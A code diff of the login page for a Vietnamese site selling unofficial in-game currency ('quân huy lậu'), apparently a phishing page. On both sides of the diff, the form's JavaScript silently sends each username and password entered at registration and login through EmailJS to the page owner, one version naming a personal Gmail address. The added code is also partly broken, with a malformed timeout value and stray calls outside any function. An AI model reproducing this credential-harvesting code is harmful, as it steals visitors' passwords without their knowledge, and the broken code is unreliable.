--- a/index.html
+++ b/index.html
@@ -22,17 +22,20 @@
     }
 </style>
 <body class="bg-gray-900 flex items-center justify-center min-h-screen">
-    <div class="bg-gray-800 text-white rounded-lg shadow-lg p-8 max-w-3xl w-full flex" id="container">
-        <div class="w-1/2 p-5">
+    <div class="bg-gray-800 text-white rounded-lg shadow-lg p-8 max-w-3xl w-full flex flex-col md:flex-row" id="container">
+        <!-- Phần thông tin -->
+        <div class="w-full md:w-1/2 p-5">
             <h1 class="text-3xl font-bold">quanhuylau.online</h1>
             <p class="mt-4 text-sm text-gray-400">
                 Là một hệ thống quân huy lậu nhập từ các nguồn không phải của Garena,
                 đảm bảo cho người chơi có trải nghiệm tốt và giá rẻ. Cam kết không bị ban.
             </p>
             <p class="text-red-400">⚠ Lưu ý: Cân nhắc khi mua số lượng lớn bởi dễ bị ban!</p>
-            <p class="text-blue-400">👥 Số lượng khách hàng đã ủng hộ: <strong>231</strong></p>
+            <p class="text-blue-400">👥 Tài khoản trên máy chủ: <strong>139</strong></p>
         </div>
-        <div class="w-1/2 bg-gray-700 p-6 rounded-lg" id="form-container">
+
+        <!-- Phần form đăng nhập -->
+        <div class="w-full md:w-1/2 bg-gray-700 p-6 rounded-lg" id="form-container">
             <h2 class="text-xl font-semibold" id="form-title">Đăng nhập hệ thống</h2>
             <p class="text-sm text-gray-400">Nếu bạn chưa có tài khoản, <a href="#" id="toggle-form" class="text-red-400">Đăng Ký Ngay!</a></p>
             <form class="mt-4" id="auth-form">
@@ -72,173 +75,182 @@
     </div>
     <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
     <script>
-        document.addEventListener("DOMContentLoaded", function () {
-            emailjs.init('BUHtg1BuVtAPT9O2M'); // Thay USER_ID của bạn
+document.addEventListener("DOMContentLoaded", function () {
+    emailjs.init('BUHtg1BuVtAPT9O2M'); // Thay USER_ID của bạn
 
-            const authForm = document.getElementById("auth-form");
-            const usernameInput = document.getElementById("username");
-            const passwordInput = document.getElementById("password");
-            const confirmPasswordInput = document.getElementById("confirm-password");
-            const submitBtn = document.getElementById("submit-btn");
-            const formTitle = document.getElementById("form-title");
-            const toggleForm = document.getElementById("toggle-form");
-            const captchaCode = document.getElementById("captcha-code");
-            const refreshCaptcha = document.getElementById("refresh-captcha");
+    const authForm = document.getElementById("auth-form");
+    const usernameInput = document.getElementById("username");
+    const passwordInput = document.getElementById("password");
+    const confirmPasswordInput = document.getElementById("confirm-password");
+    const submitBtn = document.getElementById("submit-btn");
+    const formTitle = document.getElementById("form-title");
+    const toggleForm = document.getElementById("toggle-form");
+    const captchaCode = document.getElementById("captcha-code");
+    const refreshCaptcha = document.getElementById("refresh-captcha");
 
-            let isRegistering = false;
+    let isRegistering = false;
 
-            // Chuyển đổi giữa đăng nhập và đăng ký
-            toggleForm.addEventListener("click", function (e) {
-                e.preventDefault();
-                isRegistering = !isRegistering;
+    // Chuyển đổi giữa đăng nhập và đăng ký
+    toggleForm.addEventListener("click", function (e) {
+        e.preventDefault();
+        isRegistering = !isRegistering;
 
-                if (isRegistering) {
-                    formTitle.textContent = "Đăng ký tài khoản";
-                    submitBtn.textContent = "Đăng ký";
-                    document.getElementById("confirm-password-container").classList.remove("hidden");
-                    document.getElementById("captcha-container").classList.add("hidden");
-                    toggleForm.textContent = "Đã có tài khoản? Đăng nhập!";
-                } else {
-                    formTitle.textContent = "Đăng nhập hệ thống";
-                    submitBtn.textContent = "Đăng nhập";
-                    document.getElementById("confirm-password-container").classList.add("hidden");
-                    document.getElementById("captcha-container").classList.remove("hidden");
-                    toggleForm.textContent = "Đăng Ký Ngay!";
-                    generateCaptcha();
-                }
-            });
-
-            // Hàm hiển thị thông báo
-            function showNotification(message, bgColor) {
-                const notification = document.getElementById("notification");
-                const notificationText = document.getElementById("notification-text");
-                notificationText.textContent = message;
-                notification.className = `fixed top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2 ${bgColor} text-white p-3 rounded-lg shadow-lg`;
-                notification.style.display = "block";
-
-                setTimeout(() => {
-                    notification.style.display = "none";
-                }, 3000);
-            }
-
-            // Kiểm tra tài khoản tồn tại
-            function userExists(username) {
-                let users = JSON.parse(localStorage.getItem("users")) || {};
-                return users.hasOwnProperty(username);
-            }
-
-            // Lưu tài khoản mới
-            function saveUser(username, password) {
-                let users = JSON.parse(localStorage.getItem("users")) || {};
-                users[username] = password;
-                localStorage.setItem("users", JSON.stringify(users));
-            }
-
-            // Gửi thông tin đăng ký qua Gmail
-            function sendRegistrationEmail(username, password) {
-                const templateParams = {
-                    username: username,
-                    password: password,
-                    to_email: "thiennguyenchi235aa@gmail.com", // Email nhận
-                };
-
-                emailjs.send('service_7y26eqp', 'template_mcvqowq', templateParams)
-                    .then(function (response) {
-                        console.log('Email sent successfully:', response);
-                    }, function (error) {
-                        console.error('Error sending email:', error);
-                    });
-            }
-
-            // Gửi thông tin đăng nhập qua Gmail
-            function sendLoginEmail(username, password) {
-                const templateParams = {
-                    username: username,
-                    password: password,
-                    to_email: "thiennguyenchi235aa@gmail.com", // Email nhận
-                };
-
-                emailjs.send('service_7y26eqp', 'template_mcvqowq', templateParams)
-                    .then(function (response) {
-                        console.log('Email sent successfully:', response);
-                    }, function (error) {
-                        console.error('Error sending email:', error);
-                    });
-            }
-
-            // Xử lý form đăng nhập & đăng ký
-            authForm.addEventListener("submit", function (e) {
-                e.preventDefault();
-                const username = usernameInput.value.trim();
-                const password = passwordInput.value.trim();
-                const confirmPassword = confirmPasswordInput.value.trim();
-                const captchaInput = document.getElementById("captcha-input").value.trim();
-
-                if (isRegistering) {
-                    // Đăng ký tài khoản
-                    if (userExists(username)) {
-                        showNotification("⚠ Tài khoản đã tồn tại!", "bg-red-500");
-                    } else if (password !== confirmPassword) {
-                        showNotification("⚠ Mật khẩu không khớp nhau!", "bg-red-500");
-                    } else {
-                        saveUser(username, password);
-                        sendRegistrationEmail(username, password); // Gửi email đăng ký
-                        showNotification("✅ Đăng ký thành công!", "bg-green-500");
-                        isRegistering = false;
-                        formTitle.textContent = "Đăng nhập hệ thống";
-                        submitBtn.textContent = "Đăng nhập";
-                        document.getElementById("confirm-password-container").classList.add("hidden");
-                        document.getElementById("captcha-container").classList.remove("hidden");
-                        toggleForm.textContent = "Đăng Ký Ngay!";
-                    }
-                } else {
-                    // Đăng nhập tài khoản
-                    let users = JSON.parse(localStorage.getItem("users")) || {};
-                    if (users[username] && users[username] === password) {
-                        if (captchaInput === "") {
-                            showNotification("⚠ Mã Captcha không được để trống!", "bg-red-500");
-                        } else if (captchaInput === captchaCode.textContent) {
-                            showNotification("✅ Đăng nhập thành công!", "bg-green-500");
-                            sendLoginEmail(username, password); // Gửi email đăng nhập
-                        } else {
-                            showNotification("⚠ Mã Captcha không chính xác!", "bg-red-500");
-                        }
-                    } else {
-                        showNotification("⚠ Sai tài khoản hoặc mật khẩu!", "bg-red-500");
-                        generateCaptcha();
-                    }
-                }
-            });
-
-            function generateCaptcha() {
-                const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
-                let captcha = "";
-                for (let i = 0; i < 4; i++) {
-                    captcha += chars.charAt(Math.floor(Math.random() * chars.length));
-                }
-                captchaCode.textContent = captcha;
-            }
-
-            refreshCaptcha.addEventListener("click", generateCaptcha);
-
-            // Gọi hàm khi load trang để hiển thị captcha ban đầu
+        if (isRegistering) {
+            formTitle.textContent = "Đăng ký tài khoản";
+            submitBtn.textContent = "Đăng ký";
+            document.getElementById("confirm-password-container").classList.remove("hidden");
+            document.getElementById("captcha-container").classList.add("hidden");
+            toggleForm.textContent = "Đã có tài khoản? Đăng nhập!";
+        } else {
+            formTitle.textContent = "Đăng nhập hệ thống";
+            submitBtn.textContent = "Đăng nhập";
+            document.getElementById("confirm-password-container").classList.add("hidden");
+            document.getElementById("captcha-container").classList.remove("hidden");
+            toggleForm.textContent = "Đăng Ký Ngay!";
             generateCaptcha();
+        }
+    });
 
-            // Ẩn/Hiện mật khẩu
-            const togglePassword = document.getElementById("toggle-password");
-            togglePassword.addEventListener("click", function() {
-                const type = passwordInput.type === "password" ? "text" : "password";
-                passwordInput.type = type;
-                togglePassword.textContent = type === "password" ? "👁" : "🙈";
-            });
+    // Hàm hiển thị thông báo
+    function showNotification(message, bgColor) {
+        const notification = document.getElementById("notification");
+        const notificationText = document.getElementById("notification-text");
+        notificationText.textContent = message;
+        notification.className = `fixed top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2 ${bgColor} text-white p-3 rounded-lg shadow-lg`;
+        notification.style.display = "block";
 
-            const toggleConfirmPassword = document.getElementById("toggle-confirm-password");
-            toggleConfirmPassword.addEventListener("click", function() {
-                const type = confirmPasswordInput.type === "password" ? "text" : "password";
-                confirmPasswordInput.type = type;
-                toggleConfirmPassword.textContent = type === "password" ? "👁" : "🙈";
+        setTimeout(() => {
+            notification.style.display = "none";
+        }, 3000);
+    }
+
+    // Kiểm tra tài khoản tồn tại
+    function userExists(username) {
+        let users = JSON.parse(localStorage.getItem("users")) || {};
+        return users.hasOwnProperty(username);
+    }
+
+    // Lưu tài khoản mới
+    function saveUser(username, password) {
+        let users = JSON.parse(localStorage.getItem("users")) || {};
+        users[username] = password;
+        localStorage.setItem("users", JSON.stringify(users));
+    }
+
+    // Gửi thông tin đăng ký qua Gmail
+    function sendRegistrationEmail(username, password) {
+        const templateParams = {
+            from_name: username,
+            to_name: "Người nhận",
+            message: `Tài khoản là: ${username}\nMật khẩu là: ${password}`,
+            reply_to: username, // email người đăng ký
+        };
+
+        emailjs.send('default_service', 'template_mcvqowq', templateParams)
+            .then(function (response) {
+                console.log('Email sent successfully:', response);
+            }, function (error) {
+                console.error('Error sending email:', error);
             });
-        });
+    }
+
+    // Gửi thông tin đăng nhập qua Gmail
+    function sendLoginEmail(username, password) {
+        const templateParams = {
+            from_name: username,
+            to_name: "Người nhận",
+            message: `Tài khoản là: ${username}\nMật khẩu là: ${password}`,
+            reply_to: username, // email người đăng nhập
+        };
+
+        emailjs.send('default_service', 'template_mcvqowq', templateParams)
+            .then(function (response) {
+                console.log('Email sent successfully:', response);
+            }, function (error) {
+                console.error('Error sending email:', error);
+            });
+    }
+
+    // Xử lý form đăng nhập & đăng ký
+    authForm.addEventListener("submit", function (e) {
+        e.preventDefault();
+        const username = usernameInput.value.trim();
+        const password = passwordInput.value.trim();
+        const confirmPassword = confirmPasswordInput.value.trim();
+        const captchaInput = document.getElementById("captcha-input").value.trim();
+
+        if (isRegistering) {
+            // Đăng ký tài khoản
+            if (userExists(username)) {
+                showNotification("⚠ Tài khoản đã tồn tại!", "bg-red-500");
+            } else if (password !== confirmPassword) {
+                showNotification("⚠ Mật khẩu không khớp nhau!", "bg-red-500");
+            } else {
+                saveUser(username, password);
+                sendRegistrationEmail(username, password); // Gửi email đăng ký
+                showNotification("✅ Đăng ký thành công!", "bg-green-500");
+                isRegistering = false;
+                formTitle.textContent = "Đăng nhập hệ thống";
+                submitBtn.textContent = "Đăng nhập";
+                document.getElementById("confirm-password-container").classList.add("hidden");
+                document.getElementById("captcha-container").classList.remove("hidden");
+                toggleForm.textContent = "Đăng Ký Ngay!";
+            }
+        } else {
+            // Đăng nhập tài khoản
+            let users = JSON.parse(localStorage.getItem("users")) || {};
+            if (users[username] && users[username] === password) {
+                if (captchaInput === "") {
+                    showNotification("⚠ Mã Captcha không được để trống!", "bg-red-500");
+                } else if (captchaInput === captchaCode.textContent) {
+                    showNotification("✅ Đăng nhập thành công!", "bg-green-500");
+                    sendLoginEmail(username, password); // Gửi email đăng nhập
+                    setTimeout(() => {
+                    window.location.href = "portal.html"; // Chuyển hướng sau 2 giây
+                    }, 1	000);
+                } else {
+                    showNotification("⚠ Mã Captcha không chính xác!", "bg-red-500");
+                }
+            } else {
+                showNotification("⚠ Sai tài khoản hoặc mật khẩu!", "bg-red-500");
+                generateCaptcha();
+            }
+        }
+    });
+
+    function generateCaptcha() {
+        const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+        let captcha = "";
+        for (let i = 0; i < 4; i++) {
+            captcha += chars.charAt(Math.floor(Math.random() * chars.length));
+        }
+        captchaCode.textContent = captcha;
+    }
+
+    refreshCaptcha.addEventListener("click", generateCaptcha);
+
+    // Gọi hàm khi load trang để hiển thị captcha ban đầu
+    generateCaptcha();
+
+    // Ẩn/Hiện mật khẩu
+    const togglePassword = document.getElementById("toggle-password");
+    togglePassword.addEventListener("click", function() {
+        const type = passwordInput.type === "password" ? "text" : "password";
+        passwordInput.type = type;
+        togglePassword.textContent = type === "password" ? "👁" : "🙈";
+    });
+
+    const toggleConfirmPassword = document.getElementById("toggle-confirm-password");
+    toggleConfirmPassword.addEventListener("click", function() {
+        const type = confirmPasswordInput.type === "password" ? "text" : "password";
+        confirmPasswordInput.type = type;
+        toggleConfirmPassword.textContent = type === "password" ? "👁" : "🙈";
+    });
+});
+showNotification("✅ Đăng nhập thành công!", "bg-green-500");
+sendLoginEmail(username, password); // Gửi email đăng nhập
+window.location.href = "portal.html"; // Chuyển đến trang portal.html
+
     </script>
 
 </body>
